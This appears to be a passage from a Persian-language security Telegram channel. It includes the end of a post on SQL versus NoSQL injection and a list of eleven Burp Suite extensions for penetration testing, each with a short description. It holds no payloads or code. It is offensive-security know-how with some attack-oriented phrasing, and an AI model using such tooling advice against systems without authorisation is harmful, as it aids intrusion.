شناخت تفاوت‌ها بین SQL و NoSQL، بهت کمک می‌کنه حملات تزریقی (SQLi و NoSQLi) رو دقیق‌تر و مؤثرتر پیاده‌سازی کنی. حواست باشه که همیشه قبل از هر حمله، نوع دیتابیس رو شناسایی کنی و از کوئری مناسب استفاده کنی.

مراقب باش! هکرهای موفق همیشه یک قدم جلوترن. 👀💻

#SQL #NoSQL #تست_نفوذ #امنیت_اطلاعات #Injection

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

10 Sep, 13:46


🔥 11 افزونه برتر Burp Suite

اگر می‌خوای تجربه‌ات با Burp Suite رو به سطح جدیدی ببری، این افزونه‌های بی‌نظیر رو حتما امتحان کن! با این ابزارها می‌تونی تست نفوذ خودت رو به طور قابل توجهی سریع‌تر و دقیق‌تر انجام بدی. 🚀

---

1. Autorize
این افزونه به شما کمک می‌کنه تا به راحتی تست‌های کنترل دسترسی (Authorization) رو خودکار انجام بدید و دسترسی‌های غیرمجاز رو شناسایی کنید.

---

2. Turbo Intruder
نسخه‌ای پیشرفته و بهینه از ابزار Intruder در Burp Suite که برای حملات سریع و گسترده طراحی شده. مناسب برای حملات با حجم زیاد و پیچیده.

---

3. JS Link Finder
این افزونه لینک‌ها و نقاط حساس در فایل‌های جاوا اسکریپت رو استخراج می‌کنه تا بتونید به راحتی به نقاط ضعف احتمالی دسترسی پیدا کنید.

---

4. SQLiPy (SQLMap Integration)
با استفاده از SQLiPy**، می‌تونید ابزار قدرتمند **SQLMap رو به راحتی با Burp Suite یکپارچه کنید و تست‌های تزریق SQL رو با دقت و سرعت بیشتری انجام بدید.

---

5. Burp NoSQLi Scanner
برای شناسایی آسیب‌پذیری‌های NoSQL در پایگاه‌های داده‌ی NoSQL مانند MongoDB. این افزونه به صورت خودکار به دنبال تزریق‌های NoSQL می‌گرده.

---

6. InQL Scanner
این افزونه برای کشف آسیب‌پذیری‌های GraphQL طراحی شده و به شما کمک می‌کنه درخواست‌های GraphQL رو به راحتی آنالیز و بررسی کنید.

---

7. Logger++
افزونه‌ای برای لاگ‌گیری پیشرفته که به شما اجازه می‌ده تمام ترافیک‌ها و درخواست‌های Burp Suite رو به صورت دقیق و منظم ذخیره و تجزیه تحلیل کنید.

---

8. Param Miner
برای استخراج پارامترهای پنهان در درخواست‌های HTTP. این افزونه به شما کمک می‌کنه تا پارامترهای مخفی که ممکنه آسیب‌پذیری داشته باشند رو پیدا کنید.

---

9. Upload Scanner
این افزونه به طور خودکار فایل‌های آپلود شده رو بررسی و آنالیز می‌کنه تا آسیب‌پذیری‌های احتمالی در فرآیند آپلود فایل رو کشف کنه.

---

10. Auto Repeater
با Auto Repeater، می‌تونید درخواست‌های HTTP رو به طور خودکار و به‌روزرسانی شده ارسال کنید. برای تست‌های پویای مداوم و خودکار عالیه.
---

11. Reflector
ابزاری برای شناسایی و ردیابی نقاطی از درخواست‌هاست که داده‌ها به صورت بازتابی (Reflected) به سرور برمی‌گردند. این ویژگی می‌تونه به شناسایی XSS و دیگر حملات بازتابی کمک کنه.

#BurpSuite #تست_نفوذ #امنیت_وب #هک #افزونه‌های_Burp #آسیب_پذیری #ابزارهای_هکری #باگ_هانتینگ #Burp_Extensions

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube